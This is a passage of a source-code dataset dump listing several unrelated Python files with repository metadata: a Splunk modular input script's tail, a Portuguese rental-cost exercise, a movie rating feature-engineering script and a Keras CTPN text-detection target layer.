param.firstChild.nodeType == param.firstChild.TEXT_NODE:
data = param.firstChild.data
config[param_name] = data
logging.debug("XML: '%s' -> '%s'" % (param_name, data))
checkpnt_node = root.getElementsByTagName("checkpoint_dir")[0]
if checkpnt_node and checkpnt_node.firstChild and \
checkpnt_node.firstChild.nodeType == checkpnt_node.firstChild.TEXT_NODE:
config["checkpoint_dir"] = checkpnt_node.firstChild.data
if not config:
raise Exception, "Invalid configuration received from Splunk."
except Exception, e:
raise Exception, "Error getting Splunk configuration via STDIN: %s" % str(e)
return config
#read XML configuration passed from splunkd, need to refactor to support single instance mode
def get_validation_config():
val_data = {}
# read everything from stdin
val_str = sys.stdin.read()
# parse the validation XML
doc = xml.dom.minidom.parseString(val_str)
root = doc.documentElement
logging.debug("XML: found items")
item_node = root.getElementsByTagName("item")[0]
if item_node:
logging.debug("XML: found item")
name = item_node.getAttribute("name")
val_data["stanza"] = name
params_node = item_node.getElementsByTagName("param")
for param in params_node:
name = param.getAttribute("name")
logging.debug("Found param %s" % name)
if name and param.firstChild and \
param.firstChild.nodeType == param.firstChild.TEXT_NODE:
val_data[name] = param.firstChild.data
return val_data
if __name__ == '__main__':
if len(sys.argv) > 1:
if sys.argv[1] == "--scheme":
do_scheme()
elif sys.argv[1] == "--validate-arguments":
do_validate()
else:
usage()
else:
config = get_input_config()
original_endpoint=config.get("endpoint")
#token replacement
endpoint_list = replaceTokens(original_endpoint)
sequential_mode=int(config.get("sequential_mode",0))
if bool(sequential_mode):
do_run(config,endpoint_list)
else: #parallel mode
for endpoint in endpoint_list:
requester = threading.Thread(target=do_run, args=(config,[endpoint]))
requester.start()
sys.exit(0)
| [
"ddallimore@splunk.com"
] | ddallimore@splunk.com |
5a6cba04c45e10f428b0c7903415372b7a0ae2c4 | 85af8bcd480794a413e27c114b07bfae50447437 | /Python/PycharmProjects/aula 7/desafio 015.py | b734a05b4dd97dccb6dfef94c114d18952a788af | [
"MIT"
] | permissive | MarcelaSamili/Desafios-do-curso-de-Python | 83974aeb30cc45177635a6248af2f99b3fdbd3fa | f331e91821c0c25b3e32d2075254ef650292f280 | refs/heads/main | 2023-05-31T20:07:56.844357 | 2021-07-05T12:30:18 | 2021-07-05T12:30:18 | 375,374,975 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 435 | py | # Escreva um programa que pergunte a quantidade de Km percorridos por um carro alugado e a quantidade de dias pelos quais ele foi alugado.
# Calcule o preço a pagar, sabendo que o carro custa R$60 por dia e R$0,15 por Km rodado.
km = float(input('Qualtos KM voce percorreu com o carro?KM'))
dias = int(input('Quantos dias voce alugou o carro?'))
preço = (60*dias) + (0.15*km)
print('O valor do aluguel ficou em R${}'.format(preço))
| [
"marcela.santos10.b@gmail.com"
] | marcela.santos10.b@gmail.com |
c2f2d1e2fa978cbe1369c0ec85d70b4be9c746c9 | 66f5ab6d5f78d304350ec4dd734b5d30cb8423f7 | /first.py | c60dbcc76e375946b5952d2d0841112066974bb0 | [] | no_license | akuppam/Py_programs | 4695819bbe744bed6c04b6a5cbde67da6dae0e98 | 65c7f9830c6a8602b65ae6a5b273453efdd846ac | refs/heads/master | 2021-01-19T01:13:53.999056 | 2017-04-04T20:36:50 | 2017-04-04T20:36:50 | 87,232,275 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16 | py | print "good one" | [
"noreply@github.com"
] | akuppam.noreply@github.com |
432927ddc73c6e066d33be9506269fb5c92f748b | 14a4e6e0bf76c68e471794088a5e2a95d6ce4b5a | /test.py | 687e974121098855cd758ed1256dea7e645205ec | [] | no_license | yuzhengfa/test | e16c2479baf159d887a117481398513349bd8cb0 | 63dbe2534a346b86bd77e70c829a6e4ccb886128 | refs/heads/master | 2020-04-30T09:12:53.099485 | 2019-03-20T14:58:58 | 2019-03-20T14:58:58 | 176,740,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,333 | py |
# coding: utf-8
# In[17]:
import pandas as pd
import numpy as np
import re
# In[18]:
#对drector清洗:
def sub_name(str1):
first_name = []
a = str1.split(',')
for i in a:
i = re.sub('[ ]','',i)
if i[0].encode( 'UTF-8' ).isalpha():
first_name.append(i)
else:
b = re.sub('[ A-Za-z?-í-""]','',i)
first_name.append(b)
if len(first_name) == len(a):
str1 = str()
for i in first_name:
if len(str1) == 0:
str1 = str1 +i
else:
str1 = str1 + ',' + i
return str1
# In[19]:
def get_median(data):
data.sort()
half = len(data) // 2
return (data[half] + data[~half]) / 2
# In[44]:
list1 = []
if len(list1) == 0:
print("ok")
else:
print("No")
# In[48]:
#统计相关的属性
def statistics(attribute,train_data,test_data):
#增加关于score评分的特征
num = 0
count = 0
z_count = []
s_count = []
max_score = []#最高评分
min_score = []#最低评分
ave_score = []#平均评分
max_score_count = []#最大评分对应的票房
min_score_count = []#最低评分对应的票房
max_count = []
min_count = []
ave_count = []
num_move = []
# index_count = []
A = []
B = []
C = []
D = []
E = []
F = []
G = []
H = []
I = []
# J = []
for i in test_data[attribute][:]:
a = i.split(',')
# print(a)
for b in a:
for j in train_data.index:
if b in train_data[attribute][j].split(','):
z_count.append(train_data.score[j])#评分
s_count.append(train_data.account[j])
# s_count.append(train_data1.count[j])#票房
# index_count.append(j)
# num = num + train_data.account[j]
count = count+1
# print(z_count)
# print(s_count)
# print(count)
if len(z_count) == 0:
continue
else:
A.append(max(z_count))#最大评分
B.append(min(z_count))#最小评分
C.append(sum(z_count)/count)#平均评分
# C.append(np.median(z_count))
D.append(count)
E.append(s_count[z_count.index(max(z_count))])
F.append(s_count[z_count.index(min(z_count))])
G.append(max(s_count))#最大票房
H.append(min(s_count))#最小票房
I.append(sum(s_count)/count)#平均票房
s_count = []
z_count = []
count = 0
#评分情况
max_score.append(sum(A)/len(A))#这边不应该取最大值而应该取平均值,即导演的平均值(也可以尝试用最大这里选取平均)
min_score.append(sum(B)/len(B))
ave_score.append(sum(C)/len(C))
# ave_score.append(np.median(z_count))
num_move.append(sum(D)/len(D))
max_score_count.append(sum(E)/len(E))
min_score_count.append(sum(F)/len(F))
#票房情况
max_count.append(sum(G)/len(G))
min_count.append(sum(H)/len(H))
ave_count.append(sum(I)/len(I))
# num_move.append(max(D))
A = []
B = []
C = []
D = []
E = []
F = []
G = []
H = []
I = []
# print(max_count)
# print(min_count)
# print(ave_count)
# print(num_move)
# print(max_score)
# print(min_score)
# print(ave_score)
# print(max_score_count)
# print(min_score_count)
return num_move,max_score,min_score,ave_score
# In[25]:
# train_data = pd.read_csv('train_data.csv',encoding='gbk')
# test_data = pd.read_csv('test_data.csv',encoding='gbk')
# train_data = train_data.dropna(axis=0,how='any')
# drector_num = test_data.apply(lambda x:sub_name(x['drector']),axis=1)
# writer_num = test_data.apply(lambda x:sub_name(x['writer']),axis=1)
# actor_num = test_data.apply(lambda x:sub_name(x['actor']),axis=1)
# types_num = test_data.apply(lambda x:sub_name(x['types']),axis=1)
# flim_version = list(map(lambda x: len(test_data.times[x].split(' ')),range(len(test_data))))
# country_number = list(map(lambda x: len(test_data.country[x].split(' ')),range(len(test_data))))
# test_data['types_name'] = pd.DataFrame(types_num)
# test_data['drector_name'] = pd.DataFrame(drector_num)
# test_data['writer_name'] = pd.DataFrame(writer_num)
# test_data['actor_name'] = pd.DataFrame(actor_num)
# test_data['flim_version'] = pd.DataFrame(flim_version)
# test_data['country_number'] = pd.DataFrame(country_number)
# In[26]:
# test_data
# In[53]:
# test_data.writer_name
# In[28]:
# object_name = ['drector_name','writer_name','actor_name','types_name']
# for i in object_name:
# A,B,C,D= statistics(i,train_data,test_data)
# test_data[i[0]+'_num_move'] = pd.DataFrame(A)
# test_data[i[0]+'_max_score'] = pd.DataFrame(B)
# test_data[i[0]+'_min_score'] = pd.DataFrame(C)
# test_data[i[0]+'_ave_score'] = pd.DataFrame(D)
# In[52]:
# z_count = []
# s_count = []
# count = 0
# for i in test_data['writer_name'][:]:
# a = i.split(',')
# print(a)
# for b in a:
# for j in train_data.index:
# if b in train_data['writer_name'][j].split(','):
# z_count.append(train_data.score[j])#评分
# s_count.append(train_data.account[j])
# # s_count.append(train_data1.count[j])#票房
# # index_count.append(j)
# # num = num + train_data.account[j]
# count = count+1
# if len(z_count) == 0:
# continue
# else:
# print(max(z_count))
# # print(min(z_count))
# # print(s_count)
# print(count)
# In[49]:
def change_data():
train_data = pd.read_csv('train_data.csv',encoding='gbk')
test_data = pd.read_csv('test_data.csv',encoding='gbk')
train_data = train_data.dropna(axis=0,how='any')
drector_num = test_data.apply(lambda x:sub_name(x['drector']),axis=1)
writer_num = test_data.apply(lambda x:sub_name(x['writer']),axis=1)
actor_num = test_data.apply(lambda x:sub_name(x['actor']),axis=1)
types_num = test_data.apply(lambda x:sub_name(x['types']),axis=1)
flim_version = list(map(lambda x: len(test_data.times[x].split(' ')),range(len(test_data))))
country_number = list(map(lambda x: len(test_data.country[x].split(' ')),range(len(test_data))))
test_data['types_name'] = pd.DataFrame(types_num)
test_data['drector_name'] = pd.DataFrame(drector_num)
test_data['writer_name'] = pd.DataFrame(writer_num)
test_data['actor_name'] = pd.DataFrame(actor_num)
test_data['flim_version'] = pd.DataFrame(flim_version)
test_data['country_number'] = pd.DataFrame(country_number)
object_name = ['drector_name','writer_name','actor_name','types_name']
for i in object_name:
A,B,C,D= statistics(i,train_data,test_data)
test_data[i[0]+'_num_move'] = pd.DataFrame(A)
test_data[i[0]+'_max_score'] = pd.DataFrame(B)
test_data[i[0]+'_min_score'] = pd.DataFrame(C)
test_data[i[0]+'_ave_score'] = pd.DataFrame(D)
#取导演、演员、编剧的平均创作
temp1 = list(map(lambda x:(test_data['d_num_move'][x]+test_data['w_num_move'][x])/2,test_data.index))
temp2 = list(map(lambda x:(test_data['d_num_move'][x]+test_data['a_num_move'][x])/2,test_data.index))
temp3 = list(map(lambda x:(test_data['w_num_move'][x]+test_data['a_num_move'][x])/2,test_data.index))
temp4 = list(map(lambda x:(test_data['d_num_move'][x]+test_data['w_num_move'][x]+test_data['a_num_move'][x])/3,test_data.index))
#取导演、演员、编剧的平均得分
temp9 = list(map(lambda x:(test_data['d_ave_score'][x]+test_data['w_ave_score'][x])/2,test_data.index))
temp10 = list(map(lambda x:(test_data['d_ave_score'][x]+test_data['a_ave_score'][x])/2,test_data.index))
temp11 = list(map(lambda x:(test_data['w_ave_score'][x]+test_data['a_ave_score'][x])/2,test_data.index))
temp12 = list(map(lambda x:(test_data['d_ave_score'][x]+test_data['w_ave_score'][x]+test_data['a_ave_score'][x])/3,test_data.index))
test_data['ave_num_move1'] = pd.DataFrame(temp1,index=test_data.index)
test_data['ave_num_move2'] = pd.DataFrame(temp2,index=test_data.index)
test_data['ave_num_move3'] = pd.DataFrame(temp3,index=test_data.index)
test_data['ave_num_move4'] = pd.DataFrame(temp4,index=test_data.index)
test_data['ave_score1'] = pd.DataFrame(temp9,index=test_data.index)
test_data['ave_score2'] = pd.DataFrame(temp10,index=test_data.index)
test_data['ave_score3'] = pd.DataFrame(temp11,index=test_data.index)
test_data['ave_score4'] = pd.DataFrame(temp12,index=test_data.index)
test_types = list(test_data.types)
key_s = ['剧情', '动作', '犯罪', '冒险', '科幻', '惊悚', '奇幻', '悬疑', '喜剧', '战争', '动画', '传记', '历史', '西部', '爱情', '灾难', '武侠', '古装', '音乐', '运动', '家庭', '恐怖', '鬼怪', '歌舞', '情色', '儿童', '同性', '悬念', '黑色电影', 'Adult', 'Reality-TV']
_types = [[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[]]
for i in range(0,len(list(test_types))):
temp = re.sub('[ ]','',test_types[i])
for j in range(len(_types)):
_types[j].append(list(np.where((key_s[j] in temp),[1],[0]))[0])
if i == len(list(test_types))-1:
test_data[key_s[j]] = pd.DataFrame(_types[j],index=test_data.index)
X_test = test_data.drop(['title','types','drector','writer','actor','times','country','score','types_name','drector_name','writer_name','actor_name','t_num_move'],axis=1)
return X_test
# In[50]:
test = change_data()
# In[51]:
test.to_csv('test1_data.csv',index=False,encoding='gbk')
# In[ ]:
# def get_median(data):
# data.sort()
# half = len(data) // 2
# return (data[half] + data[~half]) / 2
# In[ ]:
# data = [7.2,8.7,7.2]
# #
# np.median(data)
# In[ ]:
# change_data()
| [
"794191669@qq.com"
] | 794191669@qq.com |
9740ebd46f4efaf866df9077cf36f71f266f2f83 | 1f4c19a1bc91c09b3b5b54346b67c913363f7cd0 | /ctpn/layers/target.py | d8c13115572c3aeffa3a30d87192baf4332b5894 | [
"Apache-2.0"
] | permissive | ximingr/ctpn-with-keras | d80bcd753a8d82c4504b8635f43f8253cadb878d | d78d74bbf55cbf5d4867e363eb417c1590a8fd52 | refs/heads/master | 2020-07-06T11:32:24.968182 | 2019-09-27T05:42:32 | 2019-09-27T05:42:32 | 203,003,267 | 0 | 0 | Apache-2.0 | 2019-09-27T05:42:33 | 2019-08-18T12:57:43 | Python | UTF-8 | Python | false | false | 10,031 | py | # -*- coding: utf-8 -*-
"""
File Name: Target
Description : 分类和回归目标层
Author : mick.yi
date: 2019/3/13
"""
from keras import layers
import tensorflow as tf
from ..utils import tf_utils
def compute_iou(gt_boxes, anchors):
"""
计算iou
:param gt_boxes: [N,(y1,x1,y2,x2)]
:param anchors: [M,(y1,x1,y2,x2)]
:return: IoU [N,M]
"""
gt_boxes = tf.expand_dims(gt_boxes, axis=1) # [N,1,4]
anchors = tf.expand_dims(anchors, axis=0) # [1,M,4]
# 交集
intersect_w = tf.maximum(0.0,
tf.minimum(gt_boxes[:, :, 3], anchors[:, :, 3]) -
tf.maximum(gt_boxes[:, :, 1], anchors[:, :, 1]))
intersect_h = tf.maximum(0.0,
tf.minimum(gt_boxes[:, :, 2], anchors[:, :, 2]) -
tf.maximum(gt_boxes[:, :, 0], anchors[:, :, 0]))
intersect = intersect_h * intersect_w
# 计算面积
area_gt = (gt_boxes[:, :, 3] - gt_boxes[:, :, 1]) * \
(gt_boxes[:, :, 2] - gt_boxes[:, :, 0])
area_anchor = (anchors[:, :, 3] - anchors[:, :, 1]) * \
(anchors[:, :, 2] - anchors[:, :, 0])
# 计算并集
union = area_gt + area_anchor - intersect
# 交并比
iou = tf.divide(intersect, union, name='regress_target_iou')
return iou
def ctpn_regress_target(anchors, gt_boxes):
"""
计算回归目标
:param anchors: [N,(y1,x1,y2,x2)]
:param gt_boxes: [N,(y1,x1,y2,x2)]
:return: [N, (dy, dh, dx)] dx 代表侧边改善的
"""
# anchor高度
h = anchors[:, 2] - anchors[:, 0]
# gt高度
gt_h = gt_boxes[:, 2] - gt_boxes[:, 0]
# anchor中心点y坐标
center_y = (anchors[:, 2] + anchors[:, 0]) * 0.5
# gt中心点y坐标
gt_center_y = (gt_boxes[:, 2] + gt_boxes[:, 0]) * 0.5
# 计算回归目标
dy = (gt_center_y - center_y) / h
dh = tf.log(gt_h / h)
dx = side_regress_target(anchors, gt_boxes) # 侧边改善
target = tf.stack([dy, dh, dx], axis=1)
target /= tf.constant([0.1, 0.2, 0.1])
return target
def side_regress_target(anchors, gt_boxes):
"""
侧边改善回归目标
:param anchors: [N,(y1,x1,y2,x2)]
:param gt_boxes: anchor 对应的GT boxes[N,(y1,x1,y2,x2)]
:return:
"""
w = anchors[:, 3] - anchors[:, 1] # 实际是固定长度16
center_x = (anchors[:, 3] + anchors[:, 1]) * 0.5
gt_center_x = (gt_boxes[:, 3] + gt_boxes[:, 1]) * 0.5
# 侧边框移动到gt的侧边,相当于中心点偏移的两倍;不是侧边的anchor 偏移为0;
dx = (gt_center_x - center_x) * 2 / w
return dx
def ctpn_target_graph(gt_boxes, gt_cls, anchors, valid_anchors_indices, train_anchors_num=128, positive_ratios=0.5,
max_gt_num=50):
"""
处理单个图像的ctpn回归目标
a)正样本: 与gt IoU大于0.7的anchor,或者与GT IoU最大的那个anchor
b)需要保证所有的GT都有anchor对应
:param gt_boxes: gt边框坐标 [gt_num, (y1,x1,y2,x2,tag)], tag=0为padding
:param gt_cls: gt类别 [gt_num, 1+1], 最后一位为tag, tag=0为padding
:param anchors: [anchor_num, (y1,x1,y2,x2)]
:param valid_anchors_indices:有效的anchors索引 [anchor_num]
:param train_anchors_num
:param positive_ratios
:param max_gt_num
:return:
deltas:[train_anchors_num, (dy,dh,dx,tag)],anchor边框回归目标,tag=1为正负样本,tag=0为padding
class_id:[train_anchors_num,(class_id,tag)]
indices: [train_anchors_num,(anchors_index,tag)] tag=1为正样本,tag=0为padding,-1为负样本
"""
# 获取真正的GT,去除标签位
gt_boxes = tf_utils.remove_pad(gt_boxes)
gt_cls = tf_utils.remove_pad(gt_cls)[:, 0] # [N,1]转[N]
gt_num = tf.shape(gt_cls)[0] # gt 个数
# 计算IoU
iou = compute_iou(gt_boxes, anchors)
# 每个GT对应的IoU最大的anchor是正样本(一般有多个)
gt_iou_max = tf.reduce_max(iou, axis=1, keep_dims=True) # 每个gt最大的iou [gt_num,1]
gt_iou_max_bool = tf.equal(iou, gt_iou_max) # bool类型[gt_num,num_anchors];每个gt最大的iou(可能多个)
# 每个anchors最大iou ,且iou>0.7的为正样本
anchors_iou_max = tf.reduce_max(iou, axis=0, keep_dims=True) # 每个anchor最大的iou; [1,num_anchors]
anchors_iou_max = tf.where(tf.greater_equal(anchors_iou_max, 0.7),
anchors_iou_max,
tf.ones_like(anchors_iou_max))
anchors_iou_max_bool = tf.equal(iou, anchors_iou_max)
# 合并两部分正样本索引
positive_bool_matrix = tf.logical_or(gt_iou_max_bool, anchors_iou_max_bool)
# 获取最小的iou,用于度量
gt_match_min_iou = tf.reduce_min(tf.boolean_mask(iou, positive_bool_matrix), keep_dims=True)[0] # 一维
gt_match_mean_iou = tf.reduce_mean(tf.boolean_mask(iou, positive_bool_matrix), keep_dims=True)[0]
# 正样本索引
positive_indices = tf.where(positive_bool_matrix) # 第一维gt索引号,第二维anchor索引号
# before_sample_positive_indices = positive_indices # 采样之前的正样本索引
# 采样正样本
positive_num = tf.minimum(tf.shape(positive_indices)[0], int(train_anchors_num * positive_ratios))
positive_indices = tf.random_shuffle(positive_indices)[:positive_num]
# 获取正样本和对应的GT
positive_gt_indices = positive_indices[:, 0]
positive_anchor_indices = positive_indices[:, 1]
positive_anchors = tf.gather(anchors, positive_anchor_indices)
positive_gt_boxes = tf.gather(gt_boxes, positive_gt_indices)
positive_gt_cls = tf.gather(gt_cls, positive_gt_indices)
# 计算回归目标
deltas = ctpn_regress_target(positive_anchors, positive_gt_boxes)
# # 获取负样本 iou<0.5
negative_bool = tf.less(tf.reduce_max(iou, axis=0), 0.5)
positive_bool = tf.reduce_any(positive_bool_matrix, axis=0) # 正样本anchors [num_anchors]
negative_bool = tf.logical_and(negative_bool, tf.logical_not(positive_bool))
# 采样负样本
negative_num = tf.minimum(int(train_anchors_num * (1. - positive_ratios)), train_anchors_num - positive_num)
negative_indices = tf.random_shuffle(tf.where(negative_bool)[:, 0])[:negative_num]
negative_gt_cls = tf.zeros([negative_num]) # 负样本类别id为0
negative_deltas = tf.zeros([negative_num, 3])
# 合并正负样本
deltas = tf.concat([deltas, negative_deltas], axis=0, name='ctpn_target_deltas')
class_ids = tf.concat([positive_gt_cls, negative_gt_cls], axis=0, name='ctpn_target_class_ids')
indices = tf.concat([positive_anchor_indices, negative_indices], axis=0,
name='ctpn_train_anchor_indices')
indices = tf.gather(valid_anchors_indices, indices) # 对应到有效的索引号
# 计算padding
deltas, class_ids = tf_utils.pad_list_to_fixed_size([deltas, tf.expand_dims(class_ids, 1)],
train_anchors_num)
# 将负样本tag标志改为-1;方便后续处理;
indices = tf_utils.pad_to_fixed_size_with_negative(tf.expand_dims(indices, 1), train_anchors_num,
negative_num=negative_num, data_type=tf.int64)
return [deltas, class_ids, indices, tf.cast( # 用作度量的必须是浮点类型
gt_num, dtype=tf.float32), tf.cast(
positive_num, dtype=tf.float32), tf.cast(negative_num, dtype=tf.float32),
gt_match_min_iou, gt_match_mean_iou]
class CtpnTarget(layers.Layer):
def __init__(self, batch_size, train_anchors_num=128, positive_ratios=0.5, max_gt_num=50, **kwargs):
self.batch_size = batch_size
self.train_anchors_num = train_anchors_num
self.positive_ratios = positive_ratios
self.max_gt_num = max_gt_num
super(CtpnTarget, self).__init__(**kwargs)
def call(self, inputs, **kwargs):
"""
:param inputs:
inputs[0]: GT 边框坐标 [batch_size, MAX_GT_BOXs,(y1,x1,y2,x2,tag)] ,tag=0 为padding
inputs[1]: GT 类别 [batch_size, MAX_GT_BOXs,num_class+1] ;最后一位为tag, tag=0 为padding
inputs[2]: Anchors [batch_size, anchor_num,(y1,x1,y2,x2)]
inputs[3]: val_anchors_indices [batch_size, anchor_num]
:param kwargs:
:return:
"""
gt_boxes, gt_cls_ids, anchors, valid_anchors_indices = inputs
# options = {"train_anchors_num": self.train_anchors_num,
# "positive_ratios": self.positive_ratios,
# "max_gt_num": self.max_gt_num}
#
# outputs = tf.map_fn(fn=lambda x: ctpn_target_graph(*x, **options),
# elems=[gt_boxes, gt_cls_ids, anchors, valid_anchors_indices],
# dtype=[tf.float32] * 2 + [tf.int64] + [tf.float32] + [tf.int64] + [tf.float32] * 3)
outputs = tf_utils.batch_slice([gt_boxes, gt_cls_ids, anchors, valid_anchors_indices],
lambda x, y, z, s: ctpn_target_graph(x, y, z, s,
self.train_anchors_num,
self.positive_ratios,
self.max_gt_num),
batch_size=self.batch_size)
return outputs
def compute_output_shape(self, input_shape):
return [(input_shape[0][0], self.train_anchors_num, 4), # deltas (dy,dh,dx)
(input_shape[0][0], self.train_anchors_num, 2), # cls
(input_shape[0][0], self.train_anchors_num, 2), # indices
(input_shape[0][0],), # gt_num
(input_shape[0][0],), # positive_num
(input_shape[0][0],), # negative_num
(input_shape[0][0], 1),
(input_shape[0][0], 1)] # gt_match_min_iou
| [
"ximing.fr@gmail.com"
] | ximing.fr@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.